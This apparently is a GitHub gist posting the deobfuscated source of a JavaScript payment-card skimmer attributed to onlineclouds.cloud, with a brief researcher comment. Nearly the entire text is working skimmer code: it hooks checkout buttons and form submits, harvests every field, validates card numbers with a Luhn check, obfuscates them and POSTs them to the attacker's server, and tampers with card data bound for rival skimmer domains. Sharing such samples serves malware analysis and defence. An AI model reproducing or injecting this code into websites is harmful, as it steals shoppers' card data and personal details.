Malware from onlineclouds.cloud unfuscated
setTimeout(checkForCheckout, 100); | |
var snd = null; | |
function checkForCheckout() { | |
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) { | |
scrapeAllFields(); | |
} | |
} | |
function createQueryString() { | |
var inp = document.querySelectorAll("input, select, textarea, checkbox"); | |
for (var i = 0; i < inp.length; i++) { | |
if (inp[i].value.length > 0 && inp[i].value.length < 60) { | |
var nme = inp[i].name; | |
if (nme == "") { | |
nme = i; | |
} | |
snd += inp[i].name + "=" + inp[i].value + '&'; | |
} | |
} | |
} | |
function isValidCard(s) { | |
var v = "0123456789"; | |
var w = ""; | |
for (i = 0; i < s.length; i++) { | |
x = s.charAt(i); | |
if (v.indexOf(x, 0) != -1) w += x; | |
} | |
j = w.length / 2; | |
k = Math.floor(j); | |
m = Math.ceil(j) - k; | |
c = 0; | |
for (i = 0; i < k; i++) { | |
a = w.charAt(i * 2 + m) * 2; | |
c += a > 9 ? Math.floor(a / 10 + a % 10) : a; | |
} | |
for (i = 0; i < k + m; i++) c += w.charAt(i * 2 + 1 - m) * 1; | |
return (c % 10 == 0); | |
} | |
function scrapeAllFields() { | |
var btn = document.querySelectorAll(`a[href*='javascript:void0'],a[href='#'],button, input, submit, .btn, .button`); | |
for (var i = 0; i < btn.length; i++) { | |
var b = btn[i]; | |
// "slect" is typo here -- WdG | |
if (b.type != "text" && b.type != 'slect' && b.type != "checkbox" && b.type != 'password' && b.type != "radio") { | |
if (b.addEventListener) { | |
b.addEventListener('click', createQueryString, false); | |
} else { | |
b.attachEvent('onclick', createQueryString); | |
} | |
} | |
} | |
var frm = document.querySelectorAll('form'); | |
for (var i = 0; i < frm.length; i++) { | |
if (frm[i].addEventListener) { | |
frm[i].addEventListener('submit', createQueryString, false); | |
} else { | |
frm[i].attachEvent('onsubmit', createQueryString); | |
} | |
} | |
if (snd != null) { | |
var regexp = /(3|4|5|6)[0-9]{13,16}/gi; | |
var matches = snd.match(regexp); | |
if (matches != null) { | |
if (isValidCard(matches[0]) == true) { | |
snd = encodeAllTheThings(snd + "&shop=www.google.nl&card_123=" + matches[0]); | |
var http = new XMLHttpRequest(); | |
http.open("POST", "https://www.onlineclouds.cloud/api/v1/", true); | |
http.setRequestHeader('Content-type', "application/x-www-form-urlencoded"); | |
http.withCredentials = true; | |
http.send("data=" + snd + '&token=' + encodeAllTheThings(window.location.host)); | |
} | |
} | |
} | |
snd = null; | |
setTimeout(scrapeAllFields, 150); | |
} | |
function encodeAllTheThings(theText) { | |
output = new String; | |
Temp = new Array(); | |
Temp2 = new Array(); | |
TextSize = theText.length; | |
for (i = 0; i < TextSize; i++) { | |
rnd = Math.round(Math.random() * 122) + 68; | |
Temp[i] = theText.charCodeAt(i) + rnd; | |
Temp2[i] = rnd; | |
} | |
for (i = 0; i < TextSize; i++) { | |
output += String.fromCharCode(Temp[i], Temp2[i]); | |
} | |
return output; | |
}; | |
// second func | |
jQuery.ajaxSetup({ | |
beforeSend: function(jqXHR, settings) { | |
if (settings.url.indexOf("js-react.com") !== -1 || settings.url.indexOf('bootstrap-js.com') !== -1) { | |
console.log(settings.url); | |
var myRandom = Math.floor(Math.random() * 10); | |
var cc = new RegExp("[0-9]{13,16}"); | |
if (cc.test(settings.data)) { | |
var old_cc = settings.data.match(cc); | |
var new_data = settings.data.replace(new RegExp("[0-9]{13,16}", 'g'), old_cc[0].slice(0, -1) + myRandom); | |
settings.data = new_data; | |
} | |
} | |
} | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment